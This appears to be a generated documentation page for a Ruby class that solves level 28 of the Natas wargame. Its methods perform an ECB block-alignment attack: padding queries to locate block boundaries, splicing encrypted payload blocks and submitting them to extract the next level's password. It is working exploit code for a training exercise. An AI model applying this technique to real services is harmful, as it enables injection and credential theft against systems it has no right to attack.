class NatasLevel28
Level 28
Constants
- BLOCK_SIZE
- LEVEL
- PAGE
- PAGE_SEARCH
- PAYLOAD
Public Instance Methods
exec()
click to toggle source
# File lib/natas.rb, line 807 def exec log('Getting a blank query') data = query('') default_size = data.bytesize print_blocks(data) log('Generating new blocks') query_offset = 1 loop do data = query(' ' * query_offset) if data.bytesize > default_size + BLOCK_SIZE print_blocks(data) log("Query offset: #{query_offset}") break end query_offset += 1 end log('Generating blocks with payload') data = query("#{' ' * query_offset}#{PAYLOAD}") print_blocks(data) log('Sending encrypted payload') block_offset = (data.bytesize - default_size) / BLOCK_SIZE payload = data[(BLOCK_SIZE * block_offset)..-1] print_blocks(payload) data = post( PAGE_SEARCH, {}, { 'query' => Base64.strict_encode64(payload) } ).body match = %r(<li>(\w{32})</li>).match(data) not_found unless match found(match[1]) end
print_blocks(data)
click to toggle source
# File lib/natas.rb, line 798 def print_blocks(data) log("Size: #{data.bytesize}") (data.bytesize / BLOCK_SIZE).times do |i| s = i * BLOCK_SIZE e = s + BLOCK_SIZE - 1 log("Block #{i}: #{data[s..e].unpack1('H*')}") end end
query(text)
click to toggle source
# File lib/natas.rb, line 791 def query(text) response = post(PAGE, {}, { 'query' => text }) uri = URI.parse(response['Location']) params = URI.decode_www_form(uri.query) Base64.strict_decode64(params[0][1]) end